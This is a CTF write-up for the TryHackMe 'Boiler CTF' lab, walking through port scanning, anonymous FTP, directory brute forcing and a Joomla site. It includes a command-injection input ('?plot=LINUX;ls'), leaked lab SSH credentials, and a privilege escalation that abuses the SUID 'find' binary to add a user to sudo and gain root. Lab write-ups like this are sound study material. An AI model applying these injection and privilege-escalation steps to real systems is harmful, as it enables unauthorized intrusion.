mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-09-20 06:11:56 +00:00
12 KiB
12 KiB
TryHackMe-Boiler CTF
NMAP
Host is up (0.15s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.14.3.143
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
10000/tcp open http MiniServ 1.930 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
55007/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e3:ab:e1:39:2d:95:eb:13:55:16:d6:ce:8d:f9:11:e5 (RSA)
| 256 ae:de:f2:bb:b7:8a:00:70:20:74:56:76:25:c0:df:38 (ECDSA)
|_ 256 25:25:83:f2:a7:75:8a:a0:46:b2:12:70:04:68:5c:cb (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https
PORT 21 (FTP)
So anonymous login is allowed on ftp so ,
root@kali:~/TryHackMe/Medium/BoilerCTF# ftp 10.10.214.74
Connected to 10.10.214.74.
220 (vsFTPd 3.0.3)
Name (10.10.214.74:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Aug 22 2019 .
drwxr-xr-x 2 ftp ftp 4096 Aug 22 2019 ..
-rw-r--r-- 1 ftp ftp 74 Aug 21 2019 .info.txt
226 Directory send OK.
ftp> get .info.txt
local: .info.txt remote: .info.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for .info.txt (74 bytes).
226 Transfer complete.
74 bytes received in 0.00 secs (587.5254 kB/s)
ftp>
We find a hidden file named info.txt
This is the content of the file
hfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl!
Well this is a rabbit hole but so lets enumerate other ports .
PORT 80 (HTTP)
We get a deafult apache web page
But it's good to always view the source page and since nmap showed us that there is robots.txt so lets look for it
There wasn't anything useful in the source code of web page.
Running gobuster we found some directories
root@kali:~/TryHackMe/Medium/BoilerCTF# gobuster dir -u http://10.10.214.74/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.214.74/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/11/08 23:32:44 Starting gobuster
===============================================================
/manual (Status: 301)
/joomla (Status: 301)
I ran gobuster on /joomla
root@kali:~/TryHackMe/Medium/BoilerCTF# gobuster dir -u http://10.10.214.74/joomla -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.214.74/joomla
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/11/08 23:35:14 Starting gobuster
===============================================================
/images (Status: 301)
/media (Status: 301)
/templates (Status: 301)
/modules (Status: 301)
/tests (Status: 301)
/bin (Status: 301)
/plugins (Status: 301)
/includes (Status: 301)
/language (Status: 301)
/components (Status: 301)
/cache (Status: 301)
/libraries (Status: 301)
/installation (Status: 301)
/build (Status: 301)
/tmp (Status: 301)
/layouts (Status: 301)
/administrator (Status: 301)
I kept this brute force ruuning in the background and focused on enumurating other stuff ,/administrator presented us a login page
PORT 10000 (HTTPS)
There is a login page by the name of webmin but by answering the question on the room it doesn't seen that we
Coming back to PORT 80
I saw that my gobuster reutrned some more directories
/cli (Status: 301)
/_files (Status: 301)
/cli was empty but /_files was interesting
This time I used ciphey if you want to install this https://github.com/Ciphey/Ciphey , and this was nothing but a rabbithole again :D
root@kali:~/TryHackMe/Medium/BoilerCTF# ciphey -t VjJodmNITnBaU0JrWVdsemVRbz0K
Result 'Whopsie daisy\n' (y/N): y
Format used:
base64
utf8
base64
utf8
Final result: "Whopsie daisy"
I again run directory bruteforcing through big.txt
=============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.214.74/joomla
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/11/09 00:37:20 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/_archive (Status: 301)
/_database (Status: 301)
/_files (Status: 301)
/_test (Status: 301)
/administrator (Status: 301)
/bin (Status: 301)
/build (Status: 301)
/cache (Status: 301)
/cli (Status: 301)
/components (Status: 301)
/images (Status: 301)
/includes (Status: 301)
/language (Status: 301)
/layouts (Status: 301)
/libraries (Status: 301)
/media (Status: 301)
/modules (Status: 301)
/plugins (Status: 301)
/robots.txt (Status: 200)
And this time found archive,test,files so lets visit that
On this page run commands like this ?plot=LINUX;ls this will show the files in that directory and we can read log.txt
From that file we can find ssh credentials
basterd:superduperp@$$
PORT 55007 (SSH)
On viewing backup.sh we can find stoner's password superduperp@$$no1knows
Checking for SUID we found
stoner@Vulnerable:/home/basterd$ find / -perm /4000 2>/dev/null
/bin/su
/bin/fusermount
/bin/umount
/bin/mount
/bin/ping6
/bin/ping
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/apache2/suexec-custom
/usr/lib/apache2/suexec-pristine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/newgidmap
/usr/bin/find
/usr/bin/at
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/newuidmap
find can be used to privesc so, first I tried to give /bin/bash SUID but it failed then I put stoner in sudoers and then it got executed then switched to stoner again and then we can execute bash as root
stoner@Vulnerable:/home/basterd$ find . -exec chmod+s /bin/bash
find: missing argument to `-exec'
stoner@Vulnerable:/home/basterd$ find . -exec usermod -aG sudo stoner \;
stoner@Vulnerable:/home/basterd$ sudo bash
[sudo] password for stoner:
Sorry, try again.
[sudo] password for stoner:
Sorry, user stoner is not allowed to execute '/bin/bash' as root on Vulnerable.
stoner@Vulnerable:/home/basterd$ whoami
stoner
stoner@Vulnerable:/home/basterd$ sudo -l
User stoner may run the following commands on Vulnerable:
(root) NOPASSWD: /NotThisTime/MessinWithYa
stoner@Vulnerable:/home/basterd$ su stoner
Password:
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
stoner@Vulnerable:/home/basterd$ sudo bash
[sudo] password for stoner:
root@Vulnerable:/home/basterd#